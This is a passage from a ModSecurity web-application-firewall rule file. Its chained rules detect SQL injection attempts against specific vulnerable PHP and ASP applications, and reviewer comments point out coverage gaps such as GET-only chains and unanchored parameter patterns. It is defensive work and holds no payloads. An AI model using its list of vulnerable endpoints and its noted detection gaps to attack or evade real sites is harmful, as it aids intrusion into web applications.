SecRule REQUEST_LINE "@contains /shared/code/cp_functions_downloads.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005680,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Nicola Asuni All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_functions_downloads.php download_category UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23726'"
SecRule &TX:'/SQL_INJECTION.*ARGS:download_category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nicola Asuni All In One Control Panel (AIOCP) SQL Injection Attempt -- cp_functions_downloads.php download_category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005020) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Noname Media Photo Galerie Standard SQL Injection Attempt -- view.php id UPDATE
SecRule REQUEST_LINE "@contains /view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005020,rev:5,msg:'SLR: ET
WEB_SPECIFIC_APPS Noname Media Photo Galerie Standard SQL Injection Attempt -- view.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3261'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Noname Media Photo Galerie Standard SQL Injection Attempt -- view.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the ZENworks chains below test REQUEST_LINE for the application
# path and then count (&) TX variables whose name matches
# /SQL_INJECTION.*ARGS:<param>/; the variables are presumably set by generic SQLi
# rules that ran earlier in the transaction -- confirm the load order.
# (2006596) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp agentid UPDATE
SecRule REQUEST_LINE "@contains /dagent/downloadreport.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006596,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp agentid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21473'"
SecRule &TX:'/SQL_INJECTION.*ARGS:agentid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp agentid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): "ARGS:pass" in the chained rule below has no end anchor, so TX
# variables recorded for longer names that start with "pass" are counted too.
# (2006602) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp pass UPDATE
SecRule REQUEST_LINE "@contains /dagent/downloadreport.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006602,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21473'"
SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Novell ZENworks Patch Management (ZPM) SQL Injection Attempt -- downloadreport.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): rules 2004312 and 2004735 below have identical match conditions
# ("@contains /nukesentinel.php" plus the regex (?i:UPDATE.+SET) on QUERY_STRING
# and REQUEST_BODY) and differ only in id and reference tag. One request fires
# both, so the critical anomaly score is added twice. The regex is also broad:
# case-insensitive, no word boundaries, any text between "update" and "set".
# (2004312) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE
SecRule REQUEST_LINE "@contains /nukesentinel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004312,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/462453/100/0/threaded'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004735) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE
SecRule REQUEST_LINE "@contains /nukesentinel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004735,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3338'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nukesentinel.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004741) SpiderLabs Research
(SLR) Public Vulns: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nsbypass.php UPDATE
# NOTE(review): this chain tests REQUEST_LINE for /includes/nsbypass.php and then
# applies (?i:UPDATE.+SET) to QUERY_STRING and REQUEST_BODY. The regex has no
# word boundaries, so benign text with "update" followed later by "set" matches.
SecRule REQUEST_LINE "@contains /includes/nsbypass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004741,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nsbypass.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3337'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NukeSentinel SQL Injection Attempt -- nsbypass.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): this chain counts (&) TX variables whose name matches
# /SQL_INJECTION.*ARGS:pid/ rather than inspecting the request itself; those
# variables are presumably set by generic SQLi rules that ran earlier -- confirm
# the load order. The name pattern is unanchored at the end.
# (2006812) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Oxygen (O2PHP Bulletin Board) SQL Injection Attempt -- viewthread.php pid UPDATE
SecRule REQUEST_LINE "@contains /viewthread.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006812,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Oxygen (O2PHP Bulletin Board) SQL Injection Attempt -- viewthread.php pid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21172'"
SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Oxygen (O2PHP Bulletin Board) SQL Injection Attempt -- viewthread.php pid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2010656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OSSIM repository_attachment.php UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /ossim/repository/repository_attachment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010656,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS OSSIM
repository_attachment.php UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10479'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:id_document/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OSSIM repository_attachment.php UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# NOTE(review), chain ending above (OSSIM): it has three links, and the middle one
# requires the literal string "GET " somewhere in REQUEST_LINE. "@contains" is
# case-sensitive and not tied to the method position, and a request that carries
# id_document in a POST body is not correlated by this chain even if a TX hit was
# recorded for that parameter. Treat it as covering GET only.

# NOTE(review): the chains below test REQUEST_LINE for the application path and
# then either count (&) TX variables named like /SQL_INJECTION.*ARGS:<param>/
# (presumably set by generic SQLi rules that ran earlier -- confirm load order)
# or apply the regex (?i:UPDATE.+SET) to QUERY_STRING and REQUEST_BODY.
# (2005602) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Okul Web Otomasyon Sistemi SQL Injection Attempt -- etkinlikbak.asp id UPDATE
SecRule REQUEST_LINE "@contains /etkinlikbak.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005602,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Okul Web Otomasyon Sistemi SQL Injection Attempt -- etkinlikbak.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3135'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Okul Web Otomasyon Sistemi SQL Injection Attempt -- etkinlikbak.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the reference tag on the rule below reads
# 'url,www.securityfocus.com/bid/2.2.8'. A numeric Bugtraq ID is expected after
# "bid/"; "2.2.8" is this CRS release's version number, so the tag looks like the
# result of a version-string substitution. It does not affect matching, but an
# analyst following the alert gets a dead reference. Restore the BID from the
# upstream ET signature (<BID_UNKNOWN -- not recoverable from this file>).
# (2004455) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Omegasoft SQL Injection Attempt -- OmegaMw7.asp UPDATE
SecRule REQUEST_LINE "@contains /OmegaMw7.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004455,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Omegasoft SQL Injection Attempt -- OmegaMw7.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Omegasoft SQL Injection Attempt -- OmegaMw7.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004850) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Online Web Building SQL Injection Attempt -- page.asp art_id UPDATE
SecRule REQUEST_LINE "@contains /user_pages/page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004850,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Online Web Building SQL Injection Attempt -- page.asp art_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3339'"
SecRule &TX:'/SQL_INJECTION.*ARGS:art_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Online Web Building SQL Injection Attempt -- page.asp art_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): three-link chain; the middle link requires the literal "GET " in
# REQUEST_LINE, so the same "query" parameter sent in a POST body is outside this
# chain's coverage. "ARGS:query" is also unanchored at the end.
# (2011061) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Oracle E-Business Suite Financials jtfwcpnt.jsp UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains /jtfwcpnt.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011061,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Oracle E-Business Suite Financials jtfwcpnt.jsp UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,39510'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:query/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Oracle E-Business Suite Financials jtfwcpnt.jsp UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- register.asp UserUpdate UPDATE
SecRule
REQUEST_LINE "@contains /login/register.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005942,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- register.asp UserUpdate UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21822'"
SecRule &TX:'/SQL_INJECTION.*ARGS:UserUpdate/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- register.asp UserUpdate UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): this chain applies (?i:UPDATE.+SET) to QUERY_STRING and
# REQUEST_BODY after the path test. The regex is case-insensitive with no word
# boundaries, so ordinary form text containing "update" followed later by "set"
# matches; a registration form is a likely place for such false positives.
# (2005948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- a_register.asp UPDATE
SecRule REQUEST_LINE "@contains /includes/a_register.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005948,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- a_register.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21822'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Outfront Spooky Login SQL Injection Attempt -- a_register.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the remaining chains count (&) TX variables whose name matches
# /SQL_INJECTION.*ARGS:<param>/; those variables are presumably written by
# generic SQLi rules that ran earlier -- confirm the load order. "ARGS:ip" below
# is a two-letter unanchored pattern and also selects longer names starting "ip".
# (2004246) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Stats SQL Injection Attempt -- php-stats.recphp.php ip UPDATE
SecRule REQUEST_LINE "@contains /php-stats.recphp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004246,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Stats SQL Injection Attempt -- php-stats.recphp.php ip UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3497'"
SecRule &TX:'/SQL_INJECTION.*ARGS:ip/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Stats SQL Injection Attempt -- php-stats.recphp.php ip UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the PHPAccounts chains key on "/index.php", which is not specific
# to the product; only the parameter name narrows them. Scope them to the hosts
# or locations that actually run PHPAccounts.
# (2006515) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_Type_ID UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006515,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_Type_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'"
SecRule &TX:'/SQL_INJECTION.*ARGS:Outgoing_Type_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_Type_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006521) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_ID UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006521,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'"
SecRule &TX:'/SQL_INJECTION.*ARGS:Outgoing_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Outgoing_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

#
(2006527) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Project_ID UPDATE
# Two-rule chain in phase 2: the request line contains /index.php AND at least
# one TX variable exists whose name matches /SQL_INJECTION.*ARGS:Project_ID/.
# The second rule only counts TX entries (&TX ... "@gt 0"); it does not inspect
# the Project_ID value itself, so it presumably depends on earlier SQL-injection
# rules having stored a match under such a name. Verify rule load order.
# NOTE(review): "@contains /index.php" is tested against the whole request line
# (method, URI with query string, protocol), so the chain is not specific to
# PHPAccounts; any request line containing /index.php satisfies the first rule.
# NOTE(review): msg names UPDATE, but no rule in this chain tests for that
# keyword; do not read the alert text as proof that an UPDATE statement was seen.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006527,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Project_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'"
SecRule &TX:'/SQL_INJECTION.*ARGS:Project_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Project_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006533) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Client_ID UPDATE
# Same chain shape as 2006527, keyed on TX names matching ARGS:Client_ID.
# A request that trips both chains has tx.critical_anomaly_score added once per chain.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006533,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Client_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'"
SecRule &TX:'/SQL_INJECTION.*ARGS:Client_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Client_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006539) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Invoice_ID UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006539,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Invoice_ID 
UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Invoice_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Invoice_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006545) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Vendor_ID UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006545,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Vendor_ID UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3345'" SecRule &TX:'/SQL_INJECTION.*ARGS:Vendor_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPAccounts SQL Injection Attempt -- index.php Vendor_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005972,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006974) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE
# Two-rule chain in phase 2: the request line contains /admin_hacks_list.php AND
# at least one TX variable exists whose name matches /SQL_INJECTION.*ARGS:hack_id/.
# On a match it adds tx.critical_anomaly_score to tx.anomaly_score, sets tx.msg
# and adds part E to the audit log.
SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006974,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'"
SecRule &TX:'/SQL_INJECTION.*ARGS:hack_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004046) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPEcho CMS SQL Injection Attempt -- gallery.php id UPDATE
# Same chain shape, scoped to /modules/admin/modules/gallery.php and TX names
# matching ARGS:id.
# NOTE(review): the TX name pattern has no end anchor, so TX entries recorded for
# other arguments whose names begin with "id" would also satisfy it. An end
# anchor (ARGS:id$) would limit the check to the parameter named in msg; confirm
# against how the generic SQL-injection rules name their TX entries.
SecRule REQUEST_LINE "@contains /modules/admin/modules/gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004046,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPEcho CMS SQL Injection Attempt -- gallery.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1937'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPEcho CMS SQL Injection Attempt -- gallery.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2003810) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_USER UPDATE
SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003810,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php 
